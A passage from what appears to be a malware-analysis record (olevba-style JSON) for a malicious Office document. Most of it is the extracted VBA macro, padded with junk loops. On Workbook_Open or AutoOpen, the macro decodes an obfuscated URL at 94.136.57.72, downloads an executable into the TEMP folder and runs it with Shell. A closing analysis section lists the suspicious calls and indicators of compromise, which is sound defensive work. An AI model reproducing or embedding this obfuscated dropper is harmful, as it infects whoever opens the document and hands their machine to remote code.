17\r\nDoEvents: kEKoHcEt = kEKoHcEt + 1\r\nLoop\r\n\r\nLoop\r\n\r\n\r\nDim trzlGSeU As Integer\r\ntrzlGSeU = 2\r\nDo While trzlGSeU < 83\r\nDoEvents: trzlGSeU = trzlGSeU + 1\r\nLoop\r\n\r\nGHfjoXwI = 8\r\nDo While GHfjoXwI < 51\r\n\r\nDim fVrtiule As Integer\r\n\r\nDim QkHgluUE As Integer\r\nQkHgluUE = 7\r\nDo While QkHgluUE < 55\r\nDoEvents: QkHgluUE = QkHgluUE + 1\r\nLoop\r\n\r\nfVrtiule = 1\r\nDo While fVrtiule < 12\r\n\r\nDim kTUBSEnj As Integer\r\nkTUBSEnj = 4\r\nDo While kTUBSEnj < 42\r\nDoEvents: kTUBSEnj = kTUBSEnj + 1\r\nLoop\r\n\r\nDoEvents: fVrtiule = fVrtiule + 1\r\n\r\nDim vHqDywtf As Integer\r\nvHqDywtf = 5\r\nDo While vHqDywtf < 82\r\nDoEvents: vHqDywtf = vHqDywtf + 1\r\nLoop\r\n\r\nLoop\r\n\r\n\r\nDim VWsUAVut As Integer\r\nVWsUAVut = 9\r\nDo While VWsUAVut < 43\r\nDoEvents: VWsUAVut = VWsUAVut + 1\r\nLoop\r\n\r\nDoEvents: GHfjoXwI = GHfjoXwI + 1\r\n\r\nDim gXfkXukq As Integer\r\n\r\nDim cBxGPnur As Integer\r\ncBxGPnur = 2\r\nDo While cBxGPnur < 22\r\nDoEvents: cBxGPnur = cBxGPnur + 1\r\nLoop\r\n\r\ngXfkXukq = 3\r\nDo While gXfkXukq < 73\r\n\r\nDim IOhlZkQp As Integer\r\nIOhlZkQp = 4\r\nDo While IOhlZkQp < 48\r\nDoEvents: IOhlZkQp = IOhlZkQp + 1\r\nLoop\r\n\r\nDoEvents: gXfkXukq = gXfkXukq + 1\r\n\r\nDim ZlyyQbrA As Integer\r\nZlyyQbrA = 3\r\nDo While ZlyyQbrA < 74\r\nDoEvents: ZlyyQbrA = ZlyyQbrA + 1\r\nLoop\r\n\r\nLoop\r\n\r\n\r\nDim DrVPZjIU As Integer\r\nDrVPZjIU = 5\r\nDo While DrVPZjIU < 81\r\nDoEvents: DrVPZjIU = DrVPZjIU + 1\r\nLoop\r\n\r\nLoop\r\n\r\n\r\nDim qhAjHodv As Integer\r\n\r\nDim vKVKSKJC As Integer\r\nvKVKSKJC = 3\r\nDo While vKVKSKJC < 83\r\nDoEvents: vKVKSKJC = vKVKSKJC + 1\r\nLoop\r\n\r\nqhAjHodv = 9\r\nDo While qhAjHodv < 43\r\n\r\nDim PZHwRIwe As Integer\r\nPZHwRIwe = 7\r\nDo While PZHwRIwe < 19\r\nDoEvents: PZHwRIwe = PZHwRIwe + 1\r\nLoop\r\n\r\nDoEvents: qhAjHodv = qhAjHodv + 1\r\n\r\nDim gCzEGztZ As Integer\r\ngCzEGztZ = 1\r\nDo While gCzEGztZ < 12\r\nDoEvents: gCzEGztZ = gCzEGztZ + 1\r\nLoop\r\n\r\nLoop\r\n\r\n\r\nDim 
nUMuULOI As Integer\r\nnUMuULOI = 3\r\nDo While nUMuULOI < 38\r\nDoEvents: nUMuULOI = nUMuULOI + 1\r\nLoop\r\n\r\n    FUJdsfFF\r\nEnd Sub\r\nSub Workbook_Open()\r\n\r\nDim AlqbZoUs As Integer\r\n\r\nDim RuhoEKkH As Integer\r\n\r\nDim dsDIRhxi As Integer\r\ndsDIRhxi = 1\r\nDo While dsDIRhxi < 42\r\nDoEvents: dsDIRhxi = dsDIRhxi + 1\r\nLoop\r\n\r\nRuhoEKkH = 6\r\nDo While RuhoEKkH < 43\r\n\r\nDim jFHxcspk As Integer\r\njFHxcspk = 1\r\nDo While jFHxcspk < 57\r\nDoEvents: jFHxcspk = jFHxcspk + 1\r\nLoop\r\n\r\nDoEvents: RuhoEKkH = RuhoEKkH + 1\r\n\r\nDim wfydWqpb As Integer\r\nwfydWqpb = 4\r\nDo While wfydWqpb < 25\r\nDoEvents: wfydWqpb = wfydWqpb + 1\r\nLoop\r\n\r\nLoop\r\n\r\n\r\nDim tiYpRELi As Integer\r\ntiYpRELi = 2\r\nDo While tiYpRELi < 27\r\nDoEvents: tiYpRELi = tiYpRELi + 1\r\nLoop\r\n\r\nAlqbZoUs = 3\r\nDo While AlqbZoUs < 64\r\n\r\nDim SqbbyDua As Integer\r\n\r\nDim yBlsPRDQ As Integer\r\nyBlsPRDQ = 8\r\nDo While yBlsPRDQ < 82\r\nDoEvents: yBlsPRDQ = yBlsPRDQ + 1\r\nLoop\r\n\r\nSqbbyDua = 7\r\nDo While SqbbyDua < 78\r\n\r\nDim OTnOGyJR As Integer\r\nOTnOGyJR = 4\r\nDo While OTnOGyJR < 48\r\nDoEvents: OTnOGyJR = OTnOGyJR + 1\r\nLoop\r\n\r\nDoEvents: SqbbyDua = SqbbyDua + 1\r\n\r\nDim aTZbxDek As Integer\r\naTZbxDek = 1\r\nDo While aTZbxDek < 49\r\nDoEvents: aTZbxDek = aTZbxDek + 1\r\nLoop\r\n\r\nLoop\r\n\r\n\r\nDim EfRdRuRJ As Integer\r\nEfRdRuRJ = 3\r\nDo While EfRdRuRJ < 73\r\nDoEvents: EfRdRuRJ = EfRdRuRJ + 1\r\nLoop\r\n\r\nDoEvents: AlqbZoUs = AlqbZoUs + 1\r\n\r\nDim fBalzqNT As Integer\r\n\r\nDim pbTqSExS As Integer\r\npbTqSExS = 3\r\nDo While pbTqSExS < 97\r\nDoEvents: pbTqSExS = pbTqSExS + 1\r\nLoop\r\n\r\nfBalzqNT = 3\r\nDo While fBalzqNT < 64\r\n\r\nDim YVCJKqII As Integer\r\nYVCJKqII = 6\r\nDo While YVCJKqII < 42\r\nDoEvents: YVCJKqII = YVCJKqII + 1\r\nLoop\r\n\r\nDoEvents: fBalzqNT = fBalzqNT + 1\r\n\r\nDim JPYiWagU As Integer\r\nJPYiWagU = 6\r\nDo While JPYiWagU < 21\r\nDoEvents: JPYiWagU = JPYiWagU + 1\r\nLoop\r\n\r\nLoop\r\n\r\n\r\nDim lxkhTbul 
As Integer\r\nlxkhTbul = 4\r\nDo While lxkhTbul < 78\r\nDoEvents: lxkhTbul = lxkhTbul + 1\r\nLoop\r\n\r\nLoop\r\n\r\n\r\nDim OZXQDGNw As Integer\r\n\r\nDim JSvDIoAQ As Integer\r\nJSvDIoAQ = 8\r\nDo While JSvDIoAQ < 22\r\nDoEvents: JSvDIoAQ = JSvDIoAQ + 1\r\nLoop\r\n\r\nOZXQDGNw = 7\r\nDo While OZXQDGNw < 19\r\n\r\nDim teaRGXXQ As Integer\r\nteaRGXXQ = 2\r\nDo While teaRGXXQ < 55\r\nDoEvents: teaRGXXQ = teaRGXXQ + 1\r\nLoop\r\n\r\nDoEvents: OZXQDGNw = OZXQDGNw + 1\r\n\r\nDim jGPMKSAO As Integer\r\njGPMKSAO = 1\r\nDo While jGPMKSAO < 19\r\nDoEvents: jGPMKSAO = jGPMKSAO + 1\r\nLoop\r\n\r\nLoop\r\n\r\n\r\nDim rqjmqefl As Integer\r\nrqjmqefl = 1\r\nDo While rqjmqefl < 84\r\nDoEvents: rqjmqefl = rqjmqefl + 1\r\nLoop\r\n\r\n    FUJdsfFF\r\nEnd Sub\r\nSub pHUgdsf()\r\n\r\nDim YMcAptkZ As Integer\r\n\r\nDim nElVlNph As Integer\r\n\r\nDim ouChrOFS As Integer\r\nouChrOFS = 2\r\nDo While ouChrOFS < 65\r\nDoEvents: ouChrOFS = ouChrOFS + 1\r\nLoop\r\n\r\nnElVlNph = 3\r\nDo While nElVlNph < 37\r\n\r\nDim CZRGcNnw As Integer\r\nCZRGcNnw = 9\r\nDo While CZRGcNnw < 39\r\nDoEvents: CZRGcNnw = CZRGcNnw + 1\r\nLoop\r\n\r\nDoEvents: nElVlNph = nElVlNph + 1\r\n\r\nDim MMrGXtII As Integer\r\nMMrGXtII = 6\r\nDo While MMrGXtII < 61\r\nDoEvents: MMrGXtII = MMrGXtII + 1\r\nLoop\r\n\r\nLoop\r\n\r\n\r\nDim MHcjbtTC As Integer\r\nMHcjbtTC = 6\r\nDo While MHcjbtTC < 69\r\nDoEvents: MHcjbtTC = MHcjbtTC + 1\r\nLoop\r\n\r\nYMcAptkZ = 6\r\nDo While YMcAptkZ < 65\r\n\r\nDim AbSvXauR As Integer\r\n\r\nDim arSpIiDI As Integer\r\narSpIiDI = 1\r\nDo While arSpIiDI < 73\r\nDoEvents: arSpIiDI = arSpIiDI + 1\r\nLoop\r\n\r\nAbSvXauR = 5\r\nDo While AbSvXauR < 37\r\n\r\nDim UkEMzRUw As Integer\r\nUkEMzRUw = 7\r\nDo While UkEMzRUw < 45\r\nDoEvents: UkEMzRUw = UkEMzRUw + 1\r\nLoop\r\n\r\nDoEvents: AbSvXauR = AbSvXauR + 1\r\n\r\nDim RIeMAIHI As Integer\r\nRIeMAIHI = 4\r\nDo While RIeMAIHI < 76\r\nDoEvents: RIeMAIHI = RIeMAIHI + 1\r\nLoop\r\n\r\nLoop\r\n\r\n\r\nDim rFtFCsKb As Integer\r\nrFtFCsKb = 8\r\nDo While 
rFtFCsKb < 52\r\nDoEvents: rFtFCsKb = rFtFCsKb + 1\r\nLoop\r\n\r\nDoEvents: YMcAptkZ = YMcAptkZ + 1\r\n\r\nDim GKtegDZc As Integer\r\n\r\nDim lNubgLMm As Integer\r\nlNubgLMm = 2\r\nDo While lNubgLMm < 22\r\nDoEvents: lNubgLMm = lNubgLMm + 1\r\nLoop\r\n\r\nGKtegDZc = 5\r\nDo While GKtegDZc < 98\r\n\r\nDim KNTIrcol As Integer\r\nKNTIrcol = 6\r\nDo While KNTIrcol < 62\r\nDoEvents: KNTIrcol = KNTIrcol + 1\r\nLoop\r\n\r\nDoEvents: GKtegDZc = GKtegDZc + 1\r\n\r\nDim fADzmtxi As Integer\r\nfADzmtxi = 3\r\nDo While fADzmtxi < 69\r\nDoEvents: fADzmtxi = fADzmtxi + 1\r\nLoop\r\n\r\nLoop\r\n\r\n\r\nDim YlwwqGKp As Integer\r\nYlwwqGKp = 6\r\nDo While YlwwqGKp < 17\r\nDoEvents: YlwwqGKp = YlwwqGKp + 1\r\nLoop\r\n\r\nLoop\r\n\r\n\r\nDim CXflHUkI As Integer\r\n\r\nDim rOZLfbfA As Integer\r\nrOZLfbfA = 8\r\nDo While rOZLfbfA < 26\r\nDoEvents: rOZLfbfA = rOZLfbfA + 1\r\nLoop\r\n\r\nCXflHUkI = 7\r\nDo While CXflHUkI < 19\r\n\r\nDim WQLYXSGt As Integer\r\nWQLYXSGt = 7\r\nDo While WQLYXSGt < 17\r\nDoEvents: WQLYXSGt = WQLYXSGt + 1\r\nLoop\r\n\r\nDoEvents: CXflHUkI = CXflHUkI + 1\r\n\r\nDim jsaNfleM As Integer\r\njsaNfleM = 4\r\nDo While jsaNfleM < 14\r\nDoEvents: jsaNfleM = jsaNfleM + 1\r\nLoop\r\n\r\nLoop\r\n\r\n\r\nDim wOnebkzq As Integer\r\nwOnebkzq = 4\r\nDo While wOnebkzq < 43\r\nDoEvents: wOnebkzq = wOnebkzq + 1\r\nLoop\r\n\r\n    pGYdsfsdf = HexToString(StrReverse(\"078607E2963707F607F2963707F6D6F203830383A32373E27353E2633313E24393F2F2A307474786\"))\r\n\r\nDim zwYMnQTk As Integer\r\n\r\nDim PmIJRXGl As Integer\r\n\r\nDim MWCcfpCe As Integer\r\nMWCcfpCe = 9\r\nDo While MWCcfpCe < 33\r\nDoEvents: MWCcfpCe = MWCcfpCe + 1\r\nLoop\r\n\r\nPmIJRXGl = 7\r\nDo While PmIJRXGl < 79\r\n\r\nDim QCdqXcvU As Integer\r\nQCdqXcvU = 7\r\nDo While QCdqXcvU < 14\r\nDoEvents: QCdqXcvU = QCdqXcvU + 1\r\nLoop\r\n\r\nDoEvents: PmIJRXGl = PmIJRXGl + 1\r\n\r\nDim yvwRfrSx As Integer\r\nyvwRfrSx = 8\r\nDo While yvwRfrSx < 86\r\nDoEvents: yvwRfrSx = yvwRfrSx + 1\r\nLoop\r\n\r\nLoop\r\n\r\n\r\nDim EKpnDDqb 
As Integer\r\nEKpnDDqb = 6\r\nDo While EKpnDDqb < 31\r\nDoEvents: EKpnDDqb = EKpnDDqb + 1\r\nLoop\r\n\r\nzwYMnQTk = 1\r\nDo While zwYMnQTk < 48\r\n\r\nDim yVEohnGo As Integer\r\n\r\nDim HlJMAUVN As Integer\r\nHlJMAUVN = 8\r\nDo While HlJMAUVN < 66\r\nDoEvents: HlJMAUVN = HlJMAUVN + 1\r\nLoop\r\n\r\nyVEohnGo = 8\r\nDo While yVEohnGo < 82\r\n\r\nDim lNBkYizK As Integer\r\nlNBkYizK = 4\r\nDo While lNBkYizK < 46\r\nDoEvents: lNBkYizK = lNBkYizK + 1\r\nLoop\r\n\r\nDoEvents: yVEohnGo = yVEohnGo + 1\r\n\r\nDim UhInwGiv As Integer\r\nUhInwGiv = 7\r\nDo While UhInwGiv < 17\r\nDoEvents: UhInwGiv = UhInwGiv + 1\r\nLoop\r\n\r\nLoop\r\n\r\n\r\nDim CAYUXRFT As Integer\r\nCAYUXRFT = 9\r\nDo While CAYUXRFT < 39\r\nDoEvents: CAYUXRFT = CAYUXRFT + 1\r\nLoop\r\n\r\nDoEvents: zwYMnQTk = zwYMnQTk + 1\r\n\r\nDim QfqTWCPF As Integer\r\n\r\nDim lMRJpfqH As Integer\r\nlMRJpfqH = 2\r\nDo While lMRJpfqH < 21\r\nDoEvents: lMRJpfqH = lMRJpfqH + 1\r\nLoop\r\n\r\nQfqTWCPF = 7\r\nDo While QfqTWCPF < 26\r\n\r\nDim ZCDiSoNa As Integer\r\nZCDiSoNa = 3\r\nDo While ZCDiSoNa < 32\r\nDoEvents: ZCDiSoNa = ZCDiSoNa + 1\r\nLoop\r\n\r\nDoEvents: QfqTWCPF = QfqTWCPF + 1\r\n\r\nDim OeSqbeHr As Integer\r\nOeSqbeHr = 5\r\nDo While OeSqbeHr < 81\r\nDoEvents: OeSqbeHr = OeSqbeHr + 1\r\nLoop\r\n\r\nLoop\r\n\r\n\r\nDim RUonJglO As Integer\r\nRUonJglO = 4\r\nDo While RUonJglO < 76\r\nDoEvents: RUonJglO = RUonJglO + 1\r\nLoop\r\n\r\nLoop\r\n\r\n\r\nDim vFwHMspk As Integer\r\n\r\nDim mJPnrJHi As Integer\r\nmJPnrJHi = 2\r\nDo While mJPnrJHi < 83\r\nDoEvents: mJPnrJHi = mJPnrJHi + 1\r\nLoop\r\n\r\nvFwHMspk = 5\r\nDo While vFwHMspk < 82\r\n\r\nDim odkNcoAJ As Integer\r\nodkNcoAJ = 2\r\nDo While odkNcoAJ < 56\r\nDoEvents: odkNcoAJ = odkNcoAJ + 1\r\nLoop\r\n\r\nDoEvents: vFwHMspk = vFwHMspk + 1\r\n\r\nDim zViDUjMo As Integer\r\nzViDUjMo = 8\r\nDo While zViDUjMo < 82\r\nDoEvents: zViDUjMo = zViDUjMo + 1\r\nLoop\r\n\r\nLoop\r\n\r\n\r\nDim HlFdNIYK As Integer\r\nHlFdNIYK = 6\r\nDo While HlFdNIYK < 66\r\nDoEvents: HlFdNIYK = 
HlFdNIYK + 1\r\nLoop\r\n\r\n    pHUIdsfdsf = Environ(HexToString(\"\"TEMP\"\")) & HexToString(\"\"\\vGJsdfbJHKdsf.exe\"\")\r\n\r\nDim hFBvLczq As Integer\r\n\r\nDim sdGfInUz As Integer\r\n\r\nDim rDzpXTRU As Integer\r\nrDzpXTRU = 8\r\nDo While rDzpXTRU < 27\r\nDoEvents: rDzpXTRU = rDzpXTRU + 1\r\nLoop\r\n\r\nsdGfInUz = 9\r\nDo While sdGfInUz < 94\r\n\r\nDim EGmOFzhs As Integer\r\nEGmOFzhs = 3\r\nDo While EGmOFzhs < 78\r\nDoEvents: EGmOFzhs = EGmOFzhs + 1\r\nLoop\r\n\r\nDoEvents: sdGfInUz = sdGfInUz + 1\r\n\r\nDim GcbhqWoh As Integer\r\nGcbhqWoh = 8\r\nDo While GcbhqWoh < 56\r\nDoEvents: GcbhqWoh = GcbhqWoh + 1\r\nLoop\r\n\r\nLoop\r\n\r\n\r\nDim wPjNTlzr As Integer\r\nwPjNTlzr = 5\r\nDo While wPjNTlzr < 29\r\nDoEvents: wPjNTlzr = wPjNTlzr + 1\r\nLoop\r\n\r\nhFBvLczq = 1\r\nDo While hFBvLczq < 19\r\n\r\nDim QlJoeeOL As Integer\r\n\r\nDim ijezTJuf As Integer\r\nijezTJuf = 9\r\nDo While ijezTJuf < 95\r\nDoEvents: ijezTJuf = ijezTJuf + 1\r\nLoop\r\n\r\nQlJoeeOL = 7\r\nDo While QlJoeeOL < 55\r\n\r\nDim fIBmsLkO As Integer\r\nfIBmsLkO = 1\r\nDo While fIBmsLkO < 18\r\nDoEvents: fIBmsLkO = fIBmsLkO + 1\r\nLoop\r\n\r\nDoEvents: QlJoeeOL = QlJoeeOL + 1\r\n\r\nDim DFXQHEVD As Integer\r\nDFXQHEVD = 7\r\nDo While DFXQHEVD < 22\r\nDoEvents: DFXQHEVD = DFXQHEVD + 1\r\nLoop\r\n\r\nLoop\r\n\r\n\r\nDim QBzgcPjf As Integer\r\nQBzgcPjf = 7\r\nDo While QBzgcPjf < 14\r\nDoEvents: QBzgcPjf = QBzgcPjf + 1\r\nLoop\r\n\r\nDoEvents: hFBvLczq = hFBvLczq + 1\r\n\r\nDim QhNwJeIa As Integer\r\n\r\nDim oswDtxNR As Integer\r\noswDtxNR = 2\r\nDo While oswDtxNR < 94\r\nDoEvents: oswDtxNR = oswDtxNR + 1\r\nLoop\r\n\r\nQhNwJeIa = 5\r\nDo While QhNwJeIa < 83\r\n\r\nDim iwAjDRlr As Integer\r\niwAjDRlr = 2\r\nDo While iwAjDRlr < 96\r\nDoEvents: iwAjDRlr = iwAjDRlr + 1\r\nLoop\r\n\r\nDoEvents: QhNwJeIa = QhNwJeIa + 1\r\n\r\nDim bhNxFgJB As Integer\r\nbhNxFgJB = 3\r\nDo While bhNxFgJB < 63\r\nDoEvents: bhNxFgJB = bhNxFgJB + 1\r\nLoop\r\n\r\nLoop\r\n\r\n\r\nDim puKNWZql As Integer\r\npuKNWZql = 9\r\nDo While 
puKNWZql < 65\r\nDoEvents: puKNWZql = puKNWZql + 1\r\nLoop\r\n\r\nLoop\r\n\r\n\r\nDim vHqYHkuR As Integer\r\n\r\nDim RQQvzlzC As Integer\r\nRQQvzlzC = 6\r\nDo While RQQvzlzC < 91\r\nDoEvents: RQQvzlzC = RQQvzlzC + 1\r\nLoop\r\n\r\nvHqYHkuR = 3\r\nDo While vHqYHkuR < 68\r\n\r\nDim ikLXyMyH As Integer\r\nikLXyMyH = 2\r\nDo While ikLXyMyH < 57\r\nDoEvents: ikLXyMyH = ikLXyMyH + 1\r\nLoop\r\n\r\nDoEvents: vHqYHkuR = vHqYHkuR + 1\r\n\r\nDim lBVAEDVM As Integer\r\nlBVAEDVM = 2\r\nDo While lBVAEDVM < 22\r\nDoEvents: lBVAEDVM = lBVAEDVM + 1\r\nLoop\r\n\r\nLoop\r\n\r\n\r\nDim OsCIrZRa As Integer\r\nOsCIrZRa = 4\r\nDo While OsCIrZRa < 44\r\nDoEvents: OsCIrZRa = OsCIrZRa + 1\r\nLoop\r\n\r\n    DDdsfF = URLDownloadToFile(0&, pGYdsfsdf, pHUIdsfdsf, 0&, 0&)\r\n   Dim eFdsgfsdf\r\n\r\nDim VDeuoDvD As Integer\r\n\r\nDim ZgUWsgJz As Integer\r\n\r\nDim ZeuzzfOu As Integer\r\nZeuzzfOu = 6\r\nDo While ZeuzzfOu < 33\r\nDoEvents: ZeuzzfOu = ZeuzzfOu + 1\r\nLoop\r\n\r\nZgUWsgJz = 6\r\nDo While ZgUWsgJz < 97\r\n\r\nDim QaQIVqOv As Integer\r\nQaQIVqOv = 7\r\nDo While QaQIVqOv < 76\r\nDoEvents: QaQIVqOv = QaQIVqOv + 1\r\nLoop\r\n\r\nDoEvents: ZgUWsgJz = ZgUWsgJz + 1\r\n\r\nDim GnavwpPU As Integer\r\nGnavwpPU = 8\r\nDo While GnavwpPU < 29\r\nDoEvents: GnavwpPU = GnavwpPU + 1\r\nLoop\r\n\r\nLoop\r\n\r\n\r\nDim HlQRwtjO As Integer\r\nHlQRwtjO = 8\r\nDo While HlQRwtjO < 27\r\nDoEvents: HlQRwtjO = HlQRwtjO + 1\r\nLoop\r\n\r\nVDeuoDvD = 7\r\nDo While VDeuoDvD < 79\r\n\r\nDim FBbbetwi As Integer\r\n\r\nDim lymMAHNo As Integer\r\nlymMAHNo = 4\r\nDo While lymMAHNo < 75\r\nDoEvents: lymMAHNo = lymMAHNo + 1\r\nLoop\r\n\r\nFBbbetwi = 8\r\nDo While FBbbetwi < 24\r\n\r\nDim NfILghyz As Integer\r\nNfILghyz = 7\r\nDo While NfILghyz < 23\r\nDoEvents: NfILghyz = NfILghyz + 1\r\nLoop\r\n\r\nDoEvents: FBbbetwi = FBbbetwi + 1\r\n\r\nDim PtwKRQrO As Integer\r\nPtwKRQrO = 7\r\nDo While PtwKRQrO < 53\r\nDoEvents: PtwKRQrO = PtwKRQrO + 1\r\nLoop\r\n\r\nLoop\r\n\r\n\r\nDim vvizMpkS As Integer\r\nvvizMpkS = 5\r\nDo 
While vvizMpkS < 37\r\nDoEvents: vvizMpkS = vvizMpkS + 1\r\nLoop\r\n\r\nDoEvents: VDeuoDvD = VDeuoDvD + 1\r\n\r\nDim IOhddfFb As Integer\r\n\r\nDim IjlqBqEk As Integer\r\nIjlqBqEk = 4\r\nDo While IjlqBqEk < 17\r\nDoEvents: IjlqBqEk = IjlqBqEk + 1\r\nLoop\r\n\r\nIOhddfFb = 4\r\nDo While IOhddfFb < 48\r\n\r\nDim XJrlRuTO As Integer\r\nXJrlRuTO = 9\r\nDo While XJrlRuTO < 32\r\nDoEvents: XJrlRuTO = XJrlRuTO + 1\r\nLoop\r\n\r\nDoEvents: IOhddfFb = IOhddfFb + 1\r\n\r\nDim SWqLclou As Integer\r\nSWqLclou = 5\r\nDo While SWqLclou < 51\r\nDoEvents: SWqLclou = SWqLclou + 1\r\nLoop\r\n\r\nLoop\r\n\r\n\r\nDim JhaAudJp As Integer\r\nJhaAudJp = 6\r\nDo While JhaAudJp < 65\r\nDoEvents: JhaAudJp = JhaAudJp + 1\r\nLoop\r\n\r\nLoop\r\n\r\n\r\nDim MkfbadWB As Integer\r\n\r\nDim odqFViLK As Integer\r\nodqFViLK = 9\r\nDo While odqFViLK < 94\r\nDoEvents: odqFViLK = odqFViLK + 1\r\nLoop\r\n\r\nMkfbadWB = 6\r\nDo While MkfbadWB < 65\r\n\r\nDim apCHacUZ As Integer\r\napCHacUZ = 1\r\nDo While apCHacUZ < 84\r\nDoEvents: apCHacUZ = apCHacUZ + 1\r\nLoop\r\n\r\nDoEvents: MkfbadWB = MkfbadWB + 1\r\n\r\nDim RLWNjBSf As Integer\r\nRLWNjBSf = 4\r\nDo While RLWNjBSf < 78\r\nDoEvents: RLWNjBSf = RLWNjBSf + 1\r\nLoop\r\n\r\nLoop\r\n\r\n\r\nDim olRwDPRY As Integer\r\nolRwDPRY = 9\r\nDo While olRwDPRY < 34\r\nDoEvents: olRwDPRY = olRwDPRY + 1\r\nLoop\r\n\r\n    eFdsgfsdf = Shell(pHUIdsfdsf, 1)\r\n\r\nEnd Sub\r\n\r\n\r\n\r\nPublic Function HexToString(ByVal hextext As String) As String\r\n\r\nDim yrHIysow As Integer\r\n\r\nDim gnIDaadL As Integer\r\ngnIDaadL = 3\r\nDo While gnIDaadL < 79\r\nDoEvents: gnIDaadL = gnIDaadL + 1\r\nLoop\r\n\r\nyrHIysow = 8\r\nDo While yrHIysow < 31\r\n\r\nDim leQnLCBe As Integer\r\nleQnLCBe = 4\r\nDo While leQnLCBe < 74\r\nDoEvents: leQnLCBe = leQnLCBe + 1\r\nLoop\r\n\r\nDoEvents: yrHIysow = yrHIysow + 1\r\n\r\nDim WHdmHwKU As Integer\r\nWHdmHwKU = 7\r\nDo While WHdmHwKU < 61\r\nDoEvents: WHdmHwKU = WHdmHwKU + 1\r\nLoop\r\n\r\nLoop\r\n\r\n\r\nDim KqnlOcDW As 
Integer\r\nKqnlOcDW = 8\r\nDo While KqnlOcDW < 64\r\nDoEvents: KqnlOcDW = KqnlOcDW + 1\r\nLoop\r\n\r\n    \r\nFor y = 1 To Len(hextext)\r\n\r\nDim jLdCENAm As Integer\r\n\r\nDim jjvbfVbM As Integer\r\njjvbfVbM = 4\r\nDo While jjvbfVbM < 15\r\nDoEvents: jjvbfVbM = jjvbfVbM + 1\r\nLoop\r\n\r\njLdCENAm = 1\r\nDo While jLdCENAm < 48\r\n\r\nDim uclCAiGl As Integer\r\nuclCAiGl = 2\r\nDo While uclCAiGl < 21\r\nDoEvents: uclCAiGl = uclCAiGl + 1\r\nLoop\r\n\r\nDoEvents: jLdCENAm = jLdCENAm + 1\r\n\r\nDim ArtabSHa As Integer\r\nArtabSHa = 6\r\nDo While ArtabSHa < 95\r\nDoEvents: ArtabSHa = ArtabSHa + 1\r\nLoop\r\n\r\nLoop\r\n\r\n\r\nDim kqBbDXyb As Integer\r\nkqBbDXyb = 4\r\nDo While kqBbDXyb < 76\r\nDoEvents: kqBbDXyb = kqBbDXyb + 1\r\nLoop\r\n\r\n    num = Mid(hextext, y, 2)\r\n\r\nDim RsTnWSCf As Integer\r\n\r\nDim wHGsaHRO As Integer\r\nwHGsaHRO = 2\r\nDo While wHGsaHRO < 21\r\nDoEvents: wHGsaHRO = wHGsaHRO + 1\r\nLoop\r\n\r\nRsTnWSCf = 6\r\nDo While RsTnWSCf < 44\r\n\r\nDim CZnlQgxw As Integer\r\nCZnlQgxw = 7\r\nDo While CZnlQgxw < 77\r\nDoEvents: CZnlQgxw = CZnlQgxw + 1\r\nLoop\r\n\r\nDoEvents: RsTnWSCf = RsTnWSCf + 1\r\n\r\nDim kiscIKct As Integer\r\nkiscIKct = 2\r\nDo While kiscIKct < 52\r\nDoEvents: kiscIKct = kiscIKct + 1\r\nLoop\r\n\r\nLoop\r\n\r\n\r\nDim DSiGmxcW As Integer\r\nDSiGmxcW = 5\r\nDo While DSiGmxcW < 87\r\nDoEvents: DSiGmxcW = DSiGmxcW + 1\r\nLoop\r\n\r\n    Value = Value & Chr(CDbl(\"&h\" & num))\r\n\r\nDim uNumKpHK As Integer\r\n\r\nDim ofdmMawK As Integer\r\nofdmMawK = 2\r\nDo While ofdmMawK < 95\r\nDoEvents: ofdmMawK = ofdmMawK + 1\r\nLoop\r\n\r\nuNumKpHK = 9\r\nDo While uNumKpHK < 39\r\n\r\nDim EJiSYRwI As Integer\r\nEJiSYRwI = 6\r\nDo While EJiSYRwI < 64\r\nDoEvents: EJiSYRwI = EJiSYRwI + 1\r\nLoop\r\n\r\nDoEvents: uNumKpHK = uNumKpHK + 1\r\n\r\nDim PeQbNxNT As Integer\r\nPeQbNxNT = 7\r\nDo While PeQbNxNT < 14\r\nDoEvents: PeQbNxNT = PeQbNxNT + 1\r\nLoop\r\n\r\nLoop\r\n\r\n\r\nDim tYYJQaNw As Integer\r\ntYYJQaNw = 2\r\nDo While tYYJQaNw < 
51\r\nDoEvents: tYYJQaNw = tYYJQaNw + 1\r\nLoop\r\n\r\n    y = y + 1\r\nNext y\r\n\r\n\r\nDim kDSCrVuB As Integer\r\n\r\nDim noOImZIA As Integer\r\nnoOImZIA = 3\r\nDo While noOImZIA < 34\r\nDoEvents: noOImZIA = noOImZIA + 1\r\nLoop\r\n\r\nkDSCrVuB = 4\r\nDo While kDSCrVuB < 44\r\n\r\nDim FRGpidHw As Integer\r\nFRGpidHw = 8\r\nDo While FRGpidHw < 58\r\nDoEvents: FRGpidHw = FRGpidHw + 1\r\nLoop\r\n\r\nDoEvents: kDSCrVuB = kDSCrVuB + 1\r\n\r\nDim FZBcXdGZ As Integer\r\nFZBcXdGZ = 5\r\nDo While FZBcXdGZ < 95\r\nDoEvents: FZBcXdGZ = FZBcXdGZ + 1\r\nLoop\r\n\r\nLoop\r\n\r\n\r\nDim zVtNICCx As Integer\r\nzVtNICCx = 8\r\nDo While zVtNICCx < 29\r\nDoEvents: zVtNICCx = zVtNICCx + 1\r\nLoop\r\n\r\nHexToString = Value\r\nEnd Function\r\n\r\n\r\n\n",
        "analysis": {
          "VBA String": [],
          "Dridex String": [],
          "Suspicious": [
            [
              "Hex Strings",
              "Hex-encoded strings were detected, may be used to obfuscate strings (option --decode to see all)"
            ],
            [
              "Chr",
              "May attempt to obfuscate specific strings (use option --deobf to deobfuscate)"
            ],
            [
              "StrReverse",
              "May attempt to obfuscate specific strings (use option --deobf to deobfuscate)"
            ],
            [
              "Shell",
              "May run an executable file or a system command"
            ],
            [
              "Environ",
              "May read system environment variables"
            ],
            [
              "URLDownloadToFileA",
              "May download files from the Internet"
            ],
            [
              "Lib",
              "May run code from a DLL"
            ]
          ],
          "Hex String": [
            [
              "\\vGJsdfbJHKdsf.exe",
              "5C76474A736466624A484B6473662E657865"
            ],
            [
              "TEMP",
              "54454D50"
            ]
          ],
          "Form String": [],
          "Base64 String": [],
          "AutoExec": [
            [
              "Workbook_Open",
              "Runs when the Excel Workbook is opened"
            ],
            [
              "AutoOpen",
              "Runs when the Word document is opened"
            ]
          ],
          "IOC": [
            [
              "94.136.57.72",
              "IPv4 address (obfuscation: StrReverse+Hex)"
            ],
            [
              "vGJsdfbJHKdsf.exe",
              "Executable file name (obfuscation: Hex)"
            ],
            [
              "http://94.136.57.72:8080/mopsi/popsi.php",
              "URL (obfuscation: StrReverse+Hex)"
            ]
          ]
        }
      }
    },
    "module": null,
    "date": {
      "$date": 1490354278607
    },
    "file": {
